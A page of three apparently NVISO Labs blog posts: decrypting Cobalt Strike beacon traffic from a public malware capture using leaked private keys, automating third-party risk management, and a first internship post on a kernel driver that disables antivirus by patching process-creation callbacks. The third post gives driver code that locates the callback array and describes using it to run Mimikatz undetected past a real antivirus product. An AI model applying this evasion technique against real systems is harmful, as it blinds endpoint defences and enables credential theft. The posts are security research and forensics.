NVISO Labs

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

27 October 2021 at 08:49

We decrypt Cobalt Strike traffic using one of 6 private keys we found.

In this blog post, we will analyze a Cobalt Strike infection by looking at a full packet capture that was taken during the infection. This analysis includes decryption of the C2 traffic.

If you haven’t already, we invite you to read part 1 first: Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1.

For this analysis, we are using capture file 2021-02-02-Hancitor-with-Ficker-Stealer-and-Cobalt-Strike-and-NetSupport-RAT.pcap.zip. This is one of the many malware traffic capture files that Brad Duncan shares on his website Malware-Traffic-Analysis.net.

We start with a minimum of knowledge: the capture file contains encrypted HTTP traffic of a Cobalt Strike beacon communicating with its team server.

If you want to know more about Cobalt Strike and its components, we highly recommend the following blog post.

First step: we open the capture file with Wireshark, and look for downloads of a full beacon by stager shellcode.

Although beacons can come in many forms, we can identify 2 major categories:

  1. A small piece of shellcode (a couple of hundred bytes), aka the stager shellcode, that downloads the full beacon
  2. The full beacon: a PE file that can be reflectively loaded

In this first step, we search for signs of stager shellcode in the capture file. We do this with the following display filter: http.request.uri matches "/....$".

Figure 1: packet capture for Cobalt Strike traffic

We have one hit. The path used in the GET request to download the full beacon consists of 4 characters that satisfy a condition: the byte value of the sum of the character values (aka checksum8) is a known constant. We can check this with the tool metatool.py like this:

Figure 2: using metatool.py

More info on this checksum process can be found here.
The output of the tool shows that this is a valid path to download a 32-bit full beacon (CS x86).
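The checksum8 computation itself is simple enough to sketch in a few lines of Python (0x5C and 0x5D are the constants Cobalt Strike uses for 32-bit and 64-bit beacon requests, respectively):

```python
CS_X86, CS_X64 = 0x5C, 0x5D  # expected checksum values for 32-bit and 64-bit beacon requests

def checksum8(path: str) -> int:
    """Sum of the byte values of the URI path (leading slash excluded), modulo 256."""
    return sum(path.encode("ascii")) % 256

# the 4-character path from the capture requests a 32-bit beacon
assert checksum8("EbHm") == CS_X86
```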
The download of the full beacon is captured too:

Figure 3: full beacon download

And we can extract this download:

Figure 4: export HTTP objects
Figure 5: selecting download EbHm for saving
Figure 6: saving selected download to disk

Once the full beacon has been saved to disk as EbHm.vir, it can be analyzed with 1768.py, a tool that decodes/decrypts Cobalt Strike beacons and extracts their configuration. Cobalt Strike beacons have many configuration options: all these options are stored in an encoded and embedded table.

Here is the output of the analysis:

Figure 7: extracting beacon configuration

Let’s take a closer look at some of the options.

First of all, option 0x0000 tells us that this is an HTTP beacon: it communicates over HTTP.
It does this by connecting to 192.254.79[.]71 (option 0x0008) on port 8080 (option 0x0002).
GET requests use path /ptj (option 0x0008), and POST requests use path /submit.php (option 0x000a).
And important for our analysis: there is a known private key (Has known private key) for the public key used by this beacon (option 0x0007).

Thus, armed with this information, we know that the beacon will send GET requests to the team server, to obtain instructions. If the team server has commands to be executed by the beacon, it will reply with encrypted data to the GET request. And when the beacon has to send back output from its commands to the team server, it will use a POST request with encrypted data.

If the team server has no commands for the beacon, it will send no encrypted data. This does not necessarily mean that the reply to a GET request contains no data: it is possible for the operator, through profiles, to masquerade the communication. For example, the encrypted data could be embedded inside a GIF file. But that is not the case with this beacon. We know this because there are no so-called malleable C2 instructions in this profile: option 0x000b is equal to 0x00000004, which means no operations should be performed on the data prior to decryption (we will explain this in more detail in a later blog post).

Let’s create a display filter to view this C2 traffic: http and ip.addr == 192.254.79[.]71

Figure 8: full beacon download and HTTP requests with encrypted Cobalt Strike traffic

This displays all HTTP traffic to and from the team server. Remark that we already took a look at the first 2 packets in this view (packets 6034 and 6703): that’s the download of the beacon itself, and that communication is not encrypted. Hence, we will filter these packets out with the following display filter:

http and ip.addr == 192.254.79[.]71 and frame.number > 6703

This gives us a list of GET requests with their replies. Remark that there's a GET request every minute. That too is in the beacon configuration: 60,000 ms of sleep (option 0x0003) with 0% variation (aka jitter, option 0x0005).

Figure 9: HTTP requests with encrypted Cobalt Strike traffic

We will now follow the first HTTP stream:

Figure 10: following HTTP stream
Figure 11: first HTTP stream

This is a GET request for /ptj that receives a STATUS 200 reply with no data. This means that there are no commands from the team server for this beacon for now: the operator has not issued any commands at that point in the capture file.

Remark the Cookie header of the GET request. This looks like a BASE64 string: KN9zfIq31DBBdLtF4JUjmrhm0lRKkC/I/zAiJ+Xxjz787h9yh35cRjEnXJAwQcWP4chXobXT/E5YrZjgreeGTrORnj//A5iZw2TClEnt++gLMyMHwgjsnvg9czGx6Ekpz0L1uEfkVoo4MpQ0/kJk9myZagRrPrFWdE9U7BwCzlE=

That value is encrypted metadata that the beacon sends as a BASE64 string to the team server. This metadata is RSA encrypted with the public key inside the beacon configuration (option 0x0007), and the team server can decrypt this metadata because it has the private key. Remember that some private keys have been “leaked”, we discussed this in our first blog post in this series.

Our beacon analysis showed that this beacon uses a public key with a known private key. This means we can use tool cs-decrypt-metadata.py to decrypt the metadata (cookie) like this:

Figure 12: decrypting beacon metadata

We can see here the decrypted metadata. Very important to us is the raw key: caeab4f452fe41182d504aa24966fbd0. We will use this key to decrypt traffic (the AES and HMAC keys are derived from this raw key).
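As a sketch of that derivation (this mirrors the approach documented in public Cobalt Strike analyses and implemented in Didier Stevens' decryption tools: the SHA256 digest of the 16-byte raw key is split, the first half becoming the AES key and the second half the HMAC key):

```python
import hashlib

# raw key recovered from the decrypted metadata (Figure 12)
raw_key = bytes.fromhex("caeab4f452fe41182d504aa24966fbd0")

digest = hashlib.sha256(raw_key).digest()
aes_key, hmac_key = digest[:16], digest[16:]  # first half AES, second half HMAC

print("AES key: ", aes_key.hex())
print("HMAC key:", hmac_key.hex())
```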

More metadata that we can find here is: the computername, the username, …

We will now follow the HTTP stream with packets 9379 and 9383: this is the first command sent by the operator (team server) to the beacon:

Figure 13: HTTP stream with encrypted command

Here we can see that the reply contains 48 bytes of data (Content-length). That data is encrypted:

Figure 14: hexadecimal view of HTTP stream with encrypted command

Encrypted data like this can be decrypted with tool cs-parse-http-traffic.py. Since the data is encrypted, we need to provide the raw key (option -r caeab4f452fe41182d504aa24966fbd0), and as the packet capture contains other traffic than pure Cobalt Strike C2 traffic, it is best to provide a display filter (option -Y "http and ip.addr == 192.254.79[.]71 and frame.number > 6703") so that the tool can ignore all HTTP traffic that is not C2 traffic.
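For context on what the tool verifies: in this C2 protocol the encrypted payload is AES-CBC ciphertext followed by a 16-byte tag, the truncated HMAC-SHA256 of the ciphertext. The integrity-check half of that can be sketched with Python's standard library alone (the AES decryption itself needs a third-party crypto package; the key and payload below are dummies for illustration):

```python
import hashlib
import hmac

def split_and_verify(blob: bytes, hmac_key: bytes) -> bytes:
    """Split a payload into ciphertext + trailing 16-byte HMAC tag and verify the tag."""
    ciphertext, tag = blob[:-16], blob[-16:]
    expected = hmac.new(hmac_key, ciphertext, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC verification failed")
    return ciphertext

# demo with a dummy key and a dummy "ciphertext"
key = b"\x00" * 16
ct = b"\x41" * 32
blob = ct + hmac.new(key, ct, hashlib.sha256).digest()[:16]
assert split_and_verify(blob, key) == ct
```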

This produces the following output:

Figure 15: decrypted commands and results

Now we can see that the encrypted data in packet 9383 is a sleep command, with a sleeptime of 100 ms and a jitter factor of 90%. This means that the operator instructed the beacon to become interactive (check in almost continuously).
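For reference, sleep and jitter combine by shortening the delay: the beacon sleeps a random duration between (100 − jitter)% and 100% of the configured sleep time, so 100 ms with 90% jitter yields delays between 10 ms and 100 ms. A quick sketch of the effective delay (this mirrors the documented behaviour, not Cobalt Strike's actual code):

```python
import random

def effective_sleep(sleep_ms: int, jitter_pct: int) -> float:
    """Randomized check-in delay: between (100 - jitter)% and 100% of the configured sleep."""
    low = sleep_ms * (100 - jitter_pct) / 100
    return random.uniform(low, sleep_ms)

delay = effective_sleep(100, 90)  # somewhere between 10 and 100 ms
```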

Decrypted packet 9707 contains an unknown command (id 53), but when we look at packet 9723, we see directory listing output: this is the result of the unknown command 53 being sent back to the team server (notice the POST URL /submit.php). Thus it's safe to assume that command 53 is a directory listing command.

There are many commands and results in this capture file that tool cs-parse-http-traffic.py can decrypt, too many to show here. But we invite you to reproduce the commands in this blog post, and review the output of the tool.

The last command in the capture file is a process listing command:

Figure 16: decrypted process listing command and result


Although the packet capture file we decrypted here was produced more than half a year ago by Brad Duncan, by running a malicious Cobalt Strike beacon inside a sandbox, we can decrypt it today because the operators used a rogue Cobalt Strike package that included a private key, which we recovered from VirusTotal.

Without this private key, we would not be able to decrypt the traffic.

The private key is not the only way to decrypt the traffic: if the AES key can be extracted from process memory, we can also decrypt traffic. We will cover this in an upcoming blog post.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.


Automate, automate, automate: Three Ways to Increase the Value from Third Party Risk Management Efforts

26 October 2021 at 15:28

Third Party Risk Management (“TPRM”) efforts are often considered labour-intensive, with numerous tedious, manual steps. Often, as much effort goes into managing the process as into focusing on the actual risks. To avoid this, we’d like to share three ways in which we’ve been boosting our own TPRM efficiency – through automation of three crucial phases in the third party risk assessment process:

(1) during initiation (the business risk/criticality assessment),

(2) while performing your third party (due diligence) assessments and

(3) during the monitoring phase following the assessment.

This article elaborates further on the automation of the above.

  1. Automate the third-party criticality assessment

When you are applying a risk-based approach to your TPRM efforts, third party assessments are initiated with a criticality or business risk assessment using information from the business owner working with the third party. Most of our customers will document the criticality assessment in an Excel file with a lot of back-and-forth communication.

When reviewing the intake form, we realised that the intake could be distilled to a few multiple-choice questions, such as the highest category of data the third-party can access, the level of system access and so on. We created the possibility for the customer to conduct a short, simplified assessment through Microsoft Forms. This is easily available through one single link and avoids clutter (caused by different versions of Excel files, for example). In addition, through Microsoft Flow, the output from that Form is automatically grabbed and imported in a repository. Finally, we made sure an MS Planner Task is created for each new assessment which triggers the involvement of the security second line function.
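The flow itself is built visually in Power Automate, but conceptually the intake step boils down to something like the following sketch (all names, fields and the CSV repository here are hypothetical, for illustration only):

```python
import csv
import datetime
import itertools

_counter = itertools.count(1)  # stand-in for a persistent ID sequence

def register_assessment(form_response: dict, repository: str = "assessments.csv") -> str:
    """Assign an assessment ID and store the criticality answers (hypothetical sketch)."""
    assessment_id = f"TPRM-{datetime.date.today():%Y}-{next(_counter):04d}"
    with open(repository, "a", newline="") as f:
        csv.writer(f).writerow([
            assessment_id,
            form_response.get("third_party"),
            form_response.get("data_category"),   # highest category of data the third party can access
            form_response.get("system_access"),   # level of system access
        ])
    # in the real flow, an MS Planner task is created here for second-line validation
    return assessment_id
```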

Figure 1: Gathering the MS Forms output, assigning an assessment ID and storing the gathered criticality assessment input data.
Figure 2: Summarising the outcome in an email to security team (for validation) and creation of a task for follow-up through MS Planner.

This approach results in significant value increase because it can:

  • Give the business owner a more user-friendly form to complete, rather than an Excel sheet.
  • Enable business owners to initiate a third-party security assessment at any given time, without requiring initiation by the second line.
  • Empower the second line to focus on understanding and challenging the provided input.
  • Improve the administrative handling of third-party security risk assessments, ensuring they are completed within a short time frame.

Do you want to take it to the next level? Integrate an automated approval through Power Automate for the security team.

The above case requires a low effort customisation to fully tailor this to your organisation and guarantees time efficiencies and better flexibility.

  2. Automate the execution of the assessments by leveraging tooling

You might still be wondering: how do we finally get rid of those Excel files to exchange with our third parties?  You could address this by using tooling throughout the assessment process. By leveraging these tools (such as Ceeyu, OneTrust Vendorpedia, Security Scorecard Atlas, Qualys SAQ, Prevalent and more) not only the tedious tasks of the criticality assessment, but also those of the consequential third party due diligence assessment, can be automated. Examples of tasks we have automated with such tooling include:

  • The exchange of the due diligence questionnaires.
  • The uploading and collecting of supporting evidence.
  • The tracking of the overall progress of the assessment (including the history of the review), and
  • Reporting of the assessment outcome and scoring (including comparison of vendors).

Again, significant value increase is the result and you can:

  • Reduce time-to-market: cut the administrative overhead per assessment, leading to a reduced average lead time of the assessment.
  • Identify bottlenecks: clearly pinpoint the bottleneck if the assessment does get stuck somewhere with a centralized overview of the actual status of the assessment.
  • Free up valuable time: allow the security team reviewing the provided input to focus their time on what really matters: reviewing the output.
  • Leverage reporting possibilities: minimise the effort of creating custom reports for management reporting by using the built-in reporting features.

Of course, this requires having the right tools at your disposition – however, implemented at scale, the efficiency and quality returns of the tools nearly always surpass the cost of such tooling. At NVISO for example, we’ve been able to decrease our nominal assessment cost by about 20% and our tool provides a portal to our customers that brings transparency and visibility on the handling of incoming TPRM requests.

  3. Automate the monitoring and follow-up on agreed actions by leveraging tooling

In order to maximise automation, you should also consider it for your monitoring actions. Very often assessments remain a point-in-time assessment (“snapshot”) which only paints a partial picture on how seriously your third parties take security. It is of equal importance to monitor their efforts to improve their security posture over time – i.e. the timely and effective implementation of your recommendations, and the evolution of their overall security posture. Automation can also play a major role in this process.

Here also, you would create value increase because you can:

  • Automate action plan monitoring: send automated reminders to the third parties in line with set due dates for identified follow-up actions.
  • Automate escalation: escalate to the business owner in case of overdue actions, potentially with different business rules depending on the business criticality of the supplier.
  • Free up valuable time: reducing manual interventions by your second line team helps them focus on what really matters: is the identified action effectively addressed? Is the remediation effective in reducing the risk? We typically adopt a risk-driven, sample-based approach in verifying this.
  • Stay up to date: trigger automated reinitiation of assessments when they are due for a third party.

To facilitate this, you will again require the right tools at your disposition. A dedicated TPRM tool is a plus, although it’s perfectly feasible to also realise this through Microsoft 365 for example. This monitoring process is also something we offer as an option in our TPRM as a service solution.


To summarise: all of the above automation efforts (even through leveraging tools you might already have at hand) can significantly increase the value you get from your efforts in the Third Party Risk Management (TPRM) process. Customers, as well as third parties, see the benefits of these automation initiatives in the process: it reduces their involvement, it’s easier to track the various assessments and eventually it allows them to focus on the outcome of their TPRM efforts.

If you are looking at ways to boost your TPRM efforts and are seeking assistance in implementing this within your organisation, don’t hesitate to reach out to me through [email protected].

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API (ntdll.dll), the WIN32 subsystem (kernel32.dll, user32.dll, advapi32.dll, ...) and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.


3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to SSDT patching in x64 versions of Windows (x86 versions are unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

; evil.inf

[Version]
Signature="$WINDOWS NT$"

[DestinationDirs]
DefaultDestDir = 12

[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]

[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
DiskName="evil Source Disk"
Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.


Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.


Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.


Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and
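The mask simply clears the lowest 3 bits of each entry: the callback array holds EX_FAST_REF-style pointers whose low bits are used for bookkeeping rather than addressing, so ANDing with 0xFFFFFFFFFFFFFFF8 recovers the address of the actual callback structure. In Python terms:

```python
MASK = 0xFFFFFFFFFFFFFFF8  # clear the lowest 3 bits

raw_entry = 0xFFFFA30BE2FD0CDF  # made-up value, as if read from the callback array
block = raw_entry & MASK        # address of the actual callback structure
assert hex(block) == "0xffffa30be2fd0cd8"
```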

The driver roughly follows the same method to locate the callback array in memory: it calculates offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which it obtains using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
	//obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

	//loop through the base address + 20 bytes and search for the right OPCODE (instruction)
	//we're looking for the 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy the 4 bytes after the CALL (0xE8) instruction, they contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;
			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

	//loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
	//we're looking for the 0x4C 0x8D 0x2D OPCODES which form the LEA r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

			//copy the 4 bytes after the LEA r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
			//return the absolute address of the callback array
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index into these arrays, derived from the Windows build number of the machine (osVersionInfo.dwBuildNumber).
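To illustrate the idea, the selection can be sketched in a few lines of Python. Note that the build-number-to-index mapping below is entirely hypothetical and not the driver's actual table; only the OPCODE_PSP array mirrors the code above.

```python
# Illustrative sketch only: the build-to-index mapping is hypothetical and
# NOT the driver's actual table. It merely shows how g_WindowsIndex selects
# a per-version opcode from arrays like OPCODE_PSP.
OPCODE_PSP = [0x00] * 14 + [0xE8] * 6  # mirrors the array shown above

def windows_index(build_number):
    # hypothetical mapping of a few Windows builds to array slots
    known_builds = {18362: 15, 18363: 16, 19041: 17, 19042: 18, 22000: 19}
    return known_builds.get(build_number, -1)

# on a supported build, the selected opcode is 0xE8 (CALL)
assert OPCODE_PSP[windows_index(19041)] == 0xE8
```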

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 opcode instead of the 0xE8 (CALL) opcode to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 opcode it finds is located at a 3-byte offset from the 0xE8 opcode, resulting in an invalid offset being copied by the memcpy() function.
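The offset arithmetic the driver performs can be sketched outside the kernel. The snippet below (an illustration, not the driver's code) shows why scanning for the wrong opcode is fatal: the 4 bytes after a misidentified opcode are interpreted as a rel32 operand and produce a garbage address.

```python
# Sketch of resolving an x86-64 CALL rel32 target: find the 0xE8 opcode and
# add its little-endian signed 32-bit offset plus the 5-byte instruction
# length. Scanning for the wrong opcode reads garbage bytes as the offset.
import struct

def resolve_call_target(code: bytes, base: int) -> int:
    i = code.index(0xE8)                            # first CALL opcode
    rel = struct.unpack_from("<i", code, i + 1)[0]  # signed rel32 operand
    return base + i + 5 + rel                       # next-instruction address + offset

# CALL at offset 0 with rel32 = 0x10: target = base + 5 + 0x10
assert resolve_call_target(b"\xe8\x10\x00\x00\x00", 0x1000) == 0x1015
```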

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

After restoring the AV driver callback routines to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

